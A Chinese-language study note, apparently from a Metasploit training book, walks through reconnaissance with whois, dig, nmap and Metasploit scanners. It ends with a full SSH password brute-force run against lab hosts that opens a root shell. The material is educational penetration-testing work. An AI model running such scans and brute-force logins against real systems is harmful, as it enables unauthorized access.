理一理思路喽，怎么收集信息呢

摘自:msf魔鬼训练营

0x00: whois

➜  ~ whois testfire.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: TESTFIRE.NET
   Registrar: CSC CORPORATE DOMAINS, INC.
   Sponsoring Registrar IANA ID: 299
   Whois Server: whois.corporatedomains.com
   Referral URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
   Name Server: ASIA3.AKAM.NET
   Name Server: EUR2.AKAM.NET
   Name Server: EUR5.AKAM.NET
   Name Server: NS1-206.AKAM.NET
   Name Server: NS1-99.AKAM.NET
   Name Server: USC2.AKAM.NET
   Name Server: USC3.AKAM.NET
   Name Server: USW2.AKAM.NET
   Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Updated Date: 19-jul-2016
   Creation Date: 23-jul-1999
   Expiration Date: 23-jul-2017

...

Domain Name: testfire.net
Registry Domain ID: 8363973_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2016-07-19T05:24:30Z
Creation Date: 1999-07-23T13:52:32Z
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: domainabuse@cscglobal.com
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: 
Registrant Name: IBM DNS Admin
Registrant Organization: International Business Machines Corporation
Registrant Street: New Orchard Road
Registrant City: Armonk
Registrant State/Province: NY
Registrant Postal Code: 10504
Registrant Country: US
Registrant Phone: +1.9147654227
Registrant Phone Ext: 
Registrant Fax: +1.9147654370
Registrant Fax Ext: 
Registrant Email: dnsadm@us.ibm.com
Registry Admin ID: 
Admin Name: IBM DNS Admin
Admin Organization: IBM Corporation
Admin Street: New Orchard Road
Admin City: Armonk
Admin State/Province: NY
Admin Postal Code: 10504
Admin Country: US
Admin Phone: +1.9147654227
Admin Phone Ext: 
Admin Fax: +1.9147654370
Admin Fax Ext: 
Admin Email: dnsadm@us.ibm.com
Registry Tech ID: 
Tech Name: IBM DNS Technical
Tech Organization: IBM Corporation
Tech Street: New Orchard Road
Tech City: Armonk
Tech State/Province: NY
Tech Postal Code: 10504
Tech Country: US
Tech Phone: +1.9147654227
Tech Phone Ext: 
Tech Fax: +1.9147654370
Tech Fax Ext: 
Tech Email: dnstech@us.ibm.com
Name Server: eur2.akam.net
Name Server: ns1-206.akam.net
Name Server: usc3.akam.net
Name Server: usc2.akam.net
Name Server: ns1-99.akam.net
Name Server: usw2.akam.net
Name Server: eur5.akam.net
Name Server: asia3.akam.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-07-19T05:24:30Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

0x01: nslookup

nslookup 获取DNS服务器保存在cache中的非官方解答的IP地址。

➜  ~ nslookup 
> set type=A
> testfire.net
Server:     118.118.118.51
Address:    118.118.118.51#53

Non-authoritative answer:
Name:   testfire.net
Address: 65.61.137.117
> exit

0x02: dig

Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
{global-d-opt} host [@local-server] {local-d-opt}
[ host [@local-server] {local-d-opt} […]]

➜  ~ dig @ns.watson.ibm.com testfire.net

; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 1588
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net.          IN  A

;; Query time: 310 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Sun May 21 21:45:36 CST 2017
;; MSG SIZE  rcvd: 41

0x03: searchdns.netcraft.com

信息查询服务， 子域名，操作系统类型，服务器地址，域名地址，地理位置

netcraft地址

0x04: IP2Loacation

国内： 纯真
国外： https://www.maxmind.com/zh/home

0x05: IP2Domain

国内： 7C
国外： http://www.ip-adress.com/reverse_ip

0x07: 端口扫描和主机发现

MSF：使用arp_sweep 或其他方式扫描

使用Nmap

神器不用多说

官方示例：
EXAMPLES:
  nmap -v -A scanme.nmap.org //万能使用方式 -A速度慢
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80

使用nmap获取操作系统banner

➜  ~ sudo nmap -O 192.168.1.104

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-21 23:11 CST
Nmap scan report for bogon (192.168.1.104)
Host is up (0.026s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5357/tcp open  wsdapi
6881/tcp open  bittorrent-tracker
MAC Address: 00:25:D3:E0:17:23 (AzureWave Technology)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds

0x08: WEB-INFO 采集

上述方法都是针对域名，系统，地址，位置等信息。此处开始WEB信息采集

–0x0800 dir 网站目录信息采集

google hacking

使用msf 辅助模块

–0x0801 检索特殊文件

–0x0802 特定页面

更多方式参考google hacking 技术手册

0x09网络服务扫描

–0x0900 telnet 服务

由于telnet未加密传输，很不安全，大部分被ssh取代。

msf > use auxiliary/scanner/telnet/telnet_version 
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run

[*] Scanned 028 of 256 hosts (010% complete)
[*] Scanned 078 of 256 hosts (030% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 171 of 256 hosts (066% complete)
[*] Scanned 197 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

–0x0901 SSH 弱口令

msf auxiliary(ssh_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run

[*] Scanned 052 of 256 hosts (020% complete)
[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 065 of 256 hosts (025% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 147 of 256 hosts (057% complete)
[*] Scanned 179 of 256 hosts (069% complete)
[*] 10.10.10.254:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 195 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 251 of 256 hosts (098% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.129 10.10.10.254
rhosts => 10.10.10.129 10.10.10.254
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/pass
pass_file => /root/pass
msf auxiliary(ssh_login) > run

[*] 10.10.10.254:22 SSH - Starting bruteforce
[*] 10.10.10.254:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[-] 10.10.10.254:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.254:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.129:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.129:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.254:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.254:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.129:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.129:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.254:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.254:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.129:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.129:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.254:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.254:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[-] 10.10.10.254:22 SSH - [5/5] - Failed: 'root':'ling'
[-] 10.10.10.129:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.129:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[*] Command shell session 1 opened (10.10.10.131:43480 -> 10.10.10.129:22) at 2017-05-21 21:45:18 -0400
[+] 10.10.10.129:22 SSH - [5/5] - Success: 'root':'ling' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

0x0A 使用漏洞扫描器

OpenVAS

0x0B msf配置数据库

http://blog.csdn.net/xiongjun_cdn/article/details/51241083